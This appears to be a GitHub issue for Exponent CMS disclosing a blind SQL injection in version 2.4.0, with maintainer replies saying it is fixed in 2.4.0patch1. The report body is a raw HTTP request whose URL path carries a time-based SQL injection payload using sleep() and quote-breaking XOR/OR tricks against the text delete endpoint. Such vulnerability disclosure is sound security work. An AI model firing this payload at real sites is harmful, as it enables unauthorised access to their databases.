search

exponentcms / exponent-cms

Content Management, Simple.
exponentcms.org
GNU General Public License v2.0
60 stars 24 forks source link

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (3) #1436

Closed exponentcms closed 4 years ago

exponentcms commented 4 years ago

GET /exponent/text/delete/id/if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22//src/@footer HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://192.168.118.1:80/exponent/ Cookie: PHPSESSID=e965beb8dc3e7046008f7d832de5b554; adminer_key=cdeaea5d52a8f402a28bd04980a7851b Host: 192.168.118.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: /

exponentcms commented 4 years ago

This should be fixed in 2.4.0patch1 released Nov 4th

exponentcms commented 4 years ago

Lighthouse URL: https://exponentcms.lighthouseapp.com/projects/61783/tickets/1393